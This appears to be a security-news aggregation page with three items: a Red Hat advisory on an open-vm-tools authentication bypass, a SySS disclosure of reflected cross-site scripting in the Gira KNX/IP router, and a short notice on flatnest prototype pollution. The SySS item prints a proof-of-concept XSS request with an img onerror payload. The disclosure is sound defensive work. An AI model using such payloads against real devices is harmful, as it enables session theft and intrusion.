Red Hat Security Advisory 2023-3946-01 - The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Low: open-vm-tools security update  
Advisory ID:       RHSA-2023:3946-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3946  
Issue date:        2023-06-29  
CVE Names:         CVE-2023-20867   
=====================================================================

1. Summary:

An update for open-vm-tools is now available for Red Hat Enterprise Linux  
8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Low. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - x86_64

3. Description:

The Open Virtual Machine Tools are the open source implementation of the  
VMware Tools. They are a set of guest operating system virtualization  
components that enhance performance and user experience of virtual  
machines.

Security Fix(es):

* open-vm-tools: authentication bypass vulnerability in the vgauth module  
(CVE-2023-20867)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2213087 - CVE-2023-20867 open-vm-tools: authentication bypass vulnerability in the vgauth module

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
open-vm-tools-11.2.0-2.el8_4.2.src.rpm

x86_64:  
open-vm-tools-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-debugsource-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-desktop-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-sdmp-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v.8.4):

Source:  
open-vm-tools-11.2.0-2.el8_4.2.src.rpm

x86_64:  
open-vm-tools-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-debugsource-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-desktop-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-sdmp-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v.8.4):

Source:  
open-vm-tools-11.2.0-2.el8_4.2.src.rpm

x86_64:  
open-vm-tools-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-debugsource-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-desktop-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-desktop-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-sdmp-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-sdmp-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm  
open-vm-tools-test-debuginfo-11.2.0-2.el8_4.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20867  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJ2oetzjgjWX9erEAQjERQ//bNp2+JTE7SCDT32eGIlv9X5I0wmotK51  
UrKrQBwmr5G0In0W7LdZ4mm3CwHxPzI4XZO0Ppod1br57/J9rXp/IJ/hSxsq6zHz  
wz8kJts5Wjba0zVaaKpXFpv2isEzn12yeViqKlZe4Mw2d9VgoAi/rrNx2Bb+/FRR  
BPsAQhmIbzvwZe1fOWC5ibpjcEmAEX3Xwb33jENMR4wkFna8fB4SVFxlW9w5LKkc  
4vDubNzt/cqmflAIisy1wSC11dXYeLTHEOKK1hf2fIwz7MmFYNLBQnYTitxrgixH  
ALoJSDMcK5EKvo1QoW94eluaTrJbvqHDjzfIQLvGfXTHs4a/HEfJOfNYlRp9pv/O  
UsdXcMPN0PZMSpg+BkgK3M00pFDbrLIk9vxT8KqtI4uz+hP60+Rmm40l5iJJN3eQ  
CMtTLJHLCJaRfCuiYrXY079M/8dp0YxQtsj1+rb5EwloiOmHJ3GxCUTdf36NJYNn  
yrP++bneFUYGyDiwp6Wy2F45YgPS/vAEzUWawg3rS8NmKhg4ir9lKtmPs3J6RuJ3  
fBbQUwOnWObzHk2GKHH3cinEyU/W6AgK2roEKvm+tqw+mYdmKU0HPOSJKi7x+sLz  
7pn1ARIw/zEJImnIqAlsrC/y5f8KbQWUJ7szxVG8XV9Eht5MlpfyQ+kb9Lhuf5Bo  
xv1Q7tNgGQQ=  
=+k83  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3946-01

The web interface of Gira Giersiepen Gira KNX/IP-Router 3.1.3683.0 and 3.3.8.0 responds with a "404 - Not Found" status code if a path is accessed that does not exist. However, the value of the path is reflected in the response. As the application will reflect the supplied path without context-sensitive HTML encoding, it is vulnerable to reflective cross-site scripting (XSS).

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-016 Product: Gira KNX IP router Manufacturer: Gira Giersiepen GmbH & Co. KG Affected Version(s): 3.1.3683.0, 3.3.8.0 Tested Version(s): 3.1.3683.0, 3.3.8.0 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Unknown Manufacturer Notification: 2023-05-11 Solution Date: Unknown Public Disclosure: 2023-06-28 CVE Reference: CVE-2023-33276 Author of Advisory: Marc Gessler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Gira KNX/IP router is a connection device for KNX lines for data transmission over the Internet Protocol. The manufacturer describes the product as follows (see \[1\]): > Connection of KNX lines with aid of data networks and use of the Internet protocol (IP). > Coupling of a KNX system together with the Gira HomeServer or Gira FacilityServer. > Filtering and forwarding of telegrams. > Use as line or area coupler. \[...\] Due to insufficient validation of user-provided input, it is vulnerable to cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The web server interface of the product responds with a "404 - Not Found" status code if a path is accessed that does not exist. However, the value of the path is reflected in the response. As the application will reflect the supplied path without context-sensitive HTML encoding, it is vulnerable to a reflective cross-site scripting attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Request: GET /%3Cimg%20src=SySS%20onerror=alert(%22XSS\_GIRA\_KNX/IP-Router%22)%3E HTTP/1.1 Response: HTTP/1.1 404 Not Found Server: ise GmbH HTTP-Server v2.0 Accept-Ranges: bytes Cache-Control: no-store, no-cache Content-Type: text/html Content-Length: 63 / ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Context-sensitive HTML encoding of user input before reflecting it back can be used to prevent a successful reflected cross-site scripting attack. More information can be found at: https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_Prevention\_Cheat\_Sheet.html. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-05-09: Vulnerability discovered 2023-05-11: Vulnerability reported to manufacturer 2023-06-28: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Gira KNX IP router https://katalog.gira.de/en/datenblatt.html?id=658626 \[2\] SySS Security Advisory SYSS-2023-016 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-016.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Marc Gessler of SySS GmbH. E-Mail: marc.gessler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc\_gessler.asc Key ID: 0x5077DCEB1C98D0A2 Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEP3u1WGc0j88loPWWUHfc6xyY0KIFAmSaldAACgkQUHfc6xyY 0KIGvA/6AzbvWJ4hGNZ4wIh3vCk+RAUTr+85qvyDT2+1WaucwejYTTVOcTkm3Qy7 iQtRCrkN1zJedhC6v4S21/K0GZz55Lsw3Fo/vZ+8RLY8uWPYaRMRci9YUvDx5vmK EXqInUB7+5LWIt4YBDcE4xxlpOx+uDFroXMZyp7WBHVQ1iFdd3H0fu5RT7+PJSUS Cmt1SFYUPP6VDcT1UX14WdWglQ287V2HD3MPZ0Ot42QawrQxa8t035EP84ErP1iC 7NkWYBRRyTHXKRJNHuhSEo5KR0bS/bZb728qvPIHuIbg9Foyba4ocT8D2cd2O2xt f7r8tuSVaqOdxCGNduB54lIuXwbAnGKSSU4Uv9V+rfPT8vCWnIUXS4KilA3g+BI5 HG5xQj3yhd+KAnAlDeG7VWGpr+ZFrxG89ouDeSVuzMS5QF7qmE/15MQyru/VqhVB X8JosxR65088vTxYptjBAW2Xs+3LGbbBKVWKitfGB1k8CBWnDW+AR2nKA9xg4Tbv xfjb+v3tQJxUY5P9y5aYIrEnDn8sifn2mOkBD173Nwiz6NPPsV8OsgceBH0wrE+4 00jXoo7knDLOTpb9p8gVrLQ2fZIUlSG0N8XYtOfbZ4cxLC2IyTKklWmSyWvhS3/I I5tjosrMw8A/MiQQJo0wdaEh/FPkd+BXnks+phO6q7Unq+yJl6w= =wlzJ -----END PGP SIGNATURE-----

CVE-2023-33276

All versions of the package flatnest are vulnerable to Prototype Pollution via the `nest()` function in `flatnest/nest.js` file.

**flatnest Prototype Pollution vulnerability**

High severity GitHub Reviewed Published Jun 30, 2023 to the GitHub Advisory Database • Updated Jun 30, 2023

Tag

#js